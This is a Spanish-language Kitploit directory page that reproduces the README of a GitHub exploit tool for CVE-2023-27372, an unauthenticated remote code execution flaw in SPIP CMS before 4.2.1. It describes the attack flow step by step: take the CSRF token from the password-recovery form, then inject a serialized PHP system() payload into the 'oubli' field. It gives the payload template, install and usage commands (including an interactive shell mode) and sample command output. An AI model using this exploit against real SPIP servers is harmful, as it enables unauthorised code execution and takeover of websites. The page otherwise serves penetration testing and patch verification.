Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-27372 — Exploit para CVE-2023-27372 con shell interactiva | Kitploit
Herramientas/GitHubGitHub/scriniariii/cve-2023-27372
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

Exploit para CVE-2023-27372 con shell interactiva

Ver Repositorio
1hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit CVE-2023-27372

Exploit para CVE-2023-27372, una vulnerabilidad de ejecución remota de código no autenticada en el CMS SPIP que afecta a versiones anteriores a la 4.2.1.

⚠️ Solo con fines educativos. Utilícelo exclusivamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito. El uso no autorizado es ilegal.


Descripción general

SPIP es un CMS de código abierto muy utilizado para la publicación web. Esta vulnerabilidad existe en el formulario de recuperación de contraseña (/spip.php?page=spip_pass), donde el parámetro oubli se procesa sin una sanitización adecuada, lo que permite a un atacante inyectar y ejecutar código PHP arbitrario en el servidor, sin necesidad de autenticación.

Descargar herramienta
CampoDetalles
CVECVE-2023-27372
Puntuación CVSS9.8 (Crítica)
Vector de ataqueRed
AutenticaciónNo se requiere ninguna
Versiones afectadasSPIP < 4.2.1
Tipo de vulnerabilidadInyección de código / RCE no autenticada

Cómo funciona

  1. Obtener token CSRF — Se realiza una solicitud GET a /spip.php?page=spip_pass para extraer el token formulaire_action_args del formulario HTML.

  2. Construir el payload — Se crea una cadena serializada de PHP con el comando a ejecutar:

    root@kitploit:~
    s:N:"<?php system('COMMAND'); ?>";
    

    Donde N es la longitud exacta en bytes de la cadena PHP interna.

  3. Enviar el payload — Se realiza una solicitud POST con el payload manipulado en el campo oubli junto con el token CSRF. SPIP procesa este campo sin sanitización y ejecuta el código PHP inyectado.

  4. Extraer la salida — La salida del comando se devuelve dentro de la respuesta HTML y se extrae del atributo value del campo de entrada oubli.

Requisitos

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

Instalación

root@kitploit:~

git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

Uso

root@kitploit:~
python3 exploit.py -u <URL> -c <command>
ArgumentoDescripción
-u, --urlURL base de la instancia de SPIP objetivo
-c, --commandComando del sistema operativo a ejecutar en el objetivo
-s, --shellShell interactivo

Ejemplo

root@kitploit:~

python3 exploit.py -u http://TARGET/ -c "id"
root@kitploit:~

python3 exploit.py -u http://TARGET/ -s

Salida esperada:

root@kitploit:~
[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Versiones Afectadas

Para comprobar la versión de SPIP de un objetivo, busque la etiqueta meta generator en el HTML:

root@kitploit:~
<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ Aviso legal
Utilice únicamente la información y los exploits proporcionados en mis repositorios con fines educativos y para una divulgación responsable. No soy responsable de ningún uso indebido o daño causado por el uso de estas herramientas, scripts o exploits.